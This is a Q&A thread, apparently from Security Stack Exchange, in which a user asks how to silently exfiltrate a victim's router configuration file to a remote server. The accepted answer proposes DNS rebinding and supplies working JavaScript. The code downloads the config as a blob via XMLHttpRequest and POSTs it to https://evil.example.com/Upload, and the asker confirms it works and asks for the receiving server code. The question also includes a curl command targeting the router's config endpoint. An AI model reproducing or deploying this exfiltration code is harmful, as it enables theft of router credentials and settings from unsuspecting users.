# Is it possible to exfiltrate a router config file to server using csrf ajax?

Tags: csrf, router, file-upload, configuration, ajax

the curl commend used to download the file

```
curl "http://192.168.1.1/html/management/downloadconfigfile.conf?RequestFile=/html/management/cfgfile.asp" -H "Cookie: SessionID_R3=dsadwdwqdasdwasdawd" --data "csrf_token=saddasdwadawds" --output 1.conf
```

Is it possible to send it back to the server without downloading?
using just xmlhttprequest?

[image]

or if after downloading it without user intervention?

Is it possible to grab it on the air ( on the go ) or even base64 it?
make it automatic?

Note: the file is available only to download after sending the post request and to download it again you do need to send the post request to it again.

Comment: Everything over HTTP is possible without user intervention... The protocol could not possible know if someone clicked a button or not.  You'd probably get more useful answers on _how_ to automatically construct HTTP POST requests over at StackOverflow, though... and specific questions on how to break security are off topic here, unless your question demonstrates a clear understanding of the concepts involved.

Comment: @Ghedipunk "unless your question demonstrates a clear understanding of the concepts involved"
maybe lol ..
"Everything over HTTP is possible without user intervention"
i know but the post request triggers the file to start downloading directly on the client device .

Comment: Im also trying to download config from my HG8245H router as user I dont have telecomadmin account enabled can you post how did you get `gravSessionID_R3=dsadwdwqdasdwasdawd" --data "csrf_token=saddasdwadawds" `

Answer (score 0, accepted):

I haven't tested it lately about the current protection level against it but an attacker might use [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) to send requests to the router and read it's responses.

Yes, you can do this using just xmlhttprequest. See my example below:

```
function downloadFile() {
    var oReq = new XMLHttpRequest();
    oReq.open("GET", "/html/management/downloadconfigfile.conf?RequestFile=/html/management/cfgfile.asp", true);
    oReq.responseType = "blob";

    oReq.onload = function (oEvent) {
        var blob = oReq.response;
        alert("received");
        var oReqSend = new XMLHttpRequest();
        url= "https://evil.example.com/Upload";
        oReqSend.open("POST", url, true);
        oReqSend.onload = function (oEvent) {
            alert("sent");
        };

        alert("sending1");
        oReqSend.send(blob);
        alert("sending2");
    };

    oReq.send();
}
```

https://evil.example.com/Upload is the URL where the file will be sent to. The DNS-Rebinding-Attack would be with the IP 192.168.1.1.

This example is a modified version of the code at https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Sending_and_Receiving_Binary_Data

Comment: "the router and read it's responses"
even if that file is a encrypted bin file ?

Comment: In this case, you will read an encrypted bin file.

Comment: @ThoriumBR is this even one of the xmlhttprequest properties?
is it different than responseText ? if so why it's not there in the wiki ?

Comment: Is there in which wiki?

Comment: @MoooonX This method changes the some of the CSRF-protections to make it from a Third-Party-Request to a First-Party-Request. It will be about the same as executing the request in the context of the router website. Whether the file is encrypted and similar depends on the configuration and firmware of the router.  It is the same for your question about xmlhttprequest. You should get a basic understanding of basic web programming and web security before you will be able to better understand more advanced topics like this because your question indicates you lack understanding in the basics.

Comment: @ThoriumBR i don't know but currently i am using [developer.mozilla](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) & [w3schools](https://www.w3schools.com/xml/xml_http.asp) .

Comment: @H.Idden "You should get a basic understanding of basic web programming" 
i already have some ..  but your answer isn't detailed enough tho .... 
first how does the attacker read a response from a file that's only way to get it is downloading it ?! let's say somehow you could request a file after downloading it from the victim pc you can't open it in the browser to view and post it back to the server !!

Comment: @MoooonX I am sorry if my response sounded too harsh, English is not my native language. That was not my intention. But server requests are typically one of the first things one learns when learning JavaScript. Even though I am somewhat out practice of programming in JavaScript since I didn't use it often in the last few years, I was able to find an enormous amount of examples on my first search including the one I used in my now included example as the first search result. But in general such programming questions are a better fit on other sites of stack exchange specialized in programming.

Comment: "I am sorry if my response sounded too harsh"
no problem mate . "English is not my native language"
me too . "I was able to find an enormous amount of examples on my first search"
the problem that i didn't know what to search ...
thanks mate that works great ... I appreciate if you can send me links about the other end the php server that receives the file and save it .

Comment: @MoooonX I never really used PHP because I didn't like it and switched to other languages, but a search for "php file upload" gave me this link https://www.w3schools.com/php/php_file_upload.asp which has a very easily adaptable example on the bottom of the page.